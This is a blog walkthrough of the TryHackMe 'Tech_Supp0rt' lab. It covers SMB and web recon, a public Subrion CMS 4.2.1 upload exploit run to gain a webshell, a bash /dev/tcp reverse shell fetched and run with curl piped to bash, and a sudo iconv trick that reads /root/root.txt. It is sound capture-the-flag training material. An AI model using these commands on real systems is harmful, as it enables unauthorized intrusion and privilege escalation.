Hack into the machine and investigate the target.
Please allow about 5 minutes for the machine to fully boot!
Note: The theme and security warnings encountered in this room are part of the challenge.
To start off I want to give a huge shout out to my source here. when ever I was stuck I would refer back to this walk through so please show him love and check it out!!!!!!!
Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890
How to: So to start off make sure you have the machine booted up, and once it is boot copy the IP address of the target machine. Make sure if you are not using the attackbox machine that you have your VM connected to the TryHackMe openvpn. You can do this by first being in the same folder that you have the openvpn file, run the command sudo openvpn [name of the file.ovpn]. This will get you connect and be able to work with the target machine.
Now that you are connect to the TryHackMe VPN and have the IP address of the target machine time to do some recon, lets start off by doing an nmap scan. The nmap scan I ran was nmap -A [ip of target machine], the -A will enable OS detection, version detection, script scanning, and traceroute. Here is the results of our nmap scan:
We can see that ports 22, 80, 139, and 445 are open. The next scan to run would be smbmap, run it with smbmap -H [IP of target machine] -P 139, the -H is to set the host and the -P sets the port. Here is the results of the smbmap scan:
So as you can see the websvr is read only, so we might be able to take a peak inside. Let us try using smbclient //[IP of target machine]/websvr. When prompted for a password leave it blank and hit enter. Now we are in the smbserver, you can list it's contents with the command ls , and we see an interesting file called enter.txt. We can download the file by using the command get enter.txt. This will copy it over to your current directory. You can now type exit in the smbserver to leave. Now use the command cat enter.txt to view the text file.
This gives us some good info and a hint. For the Subrion creds it says cooked with a magical formula, that’s the hint, if you go to https://gchq.github.io/CyberChef/ copy the Subrion creds and paste it into Cyber Chef by the output you will see a magic want. Click on the magic wand and it will give you the Subrion password which is:
So now we can hold that credential in our back pocket for now. Next we can run another scan to check on any sub domains, we can do this by running Gobuster. If you don't have Gobuster on your machine you can get it here (https://github.com/OJ/gobuster), once you get it then you can run it with this command, gobuster dir -u [IP of target machine] -w /usr/share/dirb/wordlists/common.txt -t 4 , the dir is for directory mode, -u is to set the url, -w sets the wordlist, and -t sets how many threads you will use. Here is the results of the Gobuster scan:
Now we have some of the server directories, we have a password lets see where we can get too. If you look at the enter.txt file that we got from the smb server it says fix the subrion site, and edit from panel we can try this by opening up firefox and typing in [IP of Target Machine]/subrion/panel/ and it should take you to a login panel that we can put in the creds we got from the enter.txt. Here is a picture of the login panel site:
Now that we are inside if you look at the bottom left you will see the version of Subrion CMS that we are running. The version is Subrion CMS v 4.2.1, we can search it to see if there are any exploits we can use. We can start with searchsploit. I ran the command searchsploit subrion cms 4.2.1, and got back 4 results.
I went with the second one, and to find the full path I ran this command searchsploit php/webapps/49876.py -p, and got back the path: /usr/share/exploitdb/exploits/php/webapps/49876.py. I can now cp it over to my current directory by using the command sudo cp /usr/share/exploitdb/exploits/php/webapps/49876.py /home/[username], we use sudo since it is in an root area that requires root privileges' to copy. Now that we have the file copied over to our current directory we can run it on the server using the following command, python3 49876.py -u http://[IP of Target Machine]/subrion/panel/ -l admin -p Hidden, the -u is to set the url, the -l is to set the user and -p sets the password. Once this is run you should have a webshell on the subrion server:
So my next move was to try and upload linpeas to the server to see what weaknesses it had, I started a python simple HTTP and tried to curl over linpeas but it kept giving me errors so my next move was to go into the web panel and upload it that way. Once you have logged in you can then click on content and then on upload. You will see a floppy disk icon in uploads that you can use to upload a file. This is how I uploaded linpeas.
Once it is in there then run the command chmod 777 linpeas.sh, this will make linpeas executable on the system . Then use the command ./linpeas.sh, now you won't see anything going on and maybe think that it froze but it will take a minute it is running. When it is finished you will have a wealth of knowledge about the server, one thing that was found looks like the password to the word press site:
Also in the linpeas scan you find some programs you can run on this system and two users:
So then I created a simple reverse shell script using nano shell.sh, and putting in it bash -i >& /dev/tcp/[IP of Attack Machine]/4444 0>&1. Make sure you have nc listening and the python simple HTTP server sending, first the nc, on your attack machine for the call too, I did this with the command nc -lnvp 4444
Then the python simple HTTP server can be ran with this command python -m SimpleHTTPServer, the -m run library module as a script:
From there on the target machine run the command curl [IP of Attack Machine]:8000/shell.sh | bash , this will get the script and run it on the target machine calling back to the nc listening port we started on our attack machine:
Now that we have a reverse shell I made my way to the tmp folder using cd /tmp, then I checked to see if python was on this machine with the command which python:
Now its time to upgrade our shell so we can run commands like sudo and su. To do this you will need to run this python command python -c 'import pty;pty.spawn("/bin/bash")' , this will allow you to run more commands on the system. Now we can use su scamsite to see if we can move over to that terminal. Once we do su scamsite it will prompt for a password so we can try the ones we know already: these are hidden and you must do the room to find them. The second password worked and we are now scamsite!
I ran the sudo -l command to see what can be run through scam site:
Then once I saw that iconv could be run I went to GTFObins to see how I could use it:
So after trying a failing at it a could times I tried sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt" , and it worked!!!! I got the flag copied it over and pasted it in TryHackMe.
Again huge shout out to my source here when ever I was stuck I would refer back to this walk through so please show him love and check it out!!!!!!!
Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890
Answer the questions below
What is the root.txt flag?
Answer: You wont get it that easlily!!!
From <https://tryhackme.com/room/techsupp0rt1>
No comments:
Post a Comment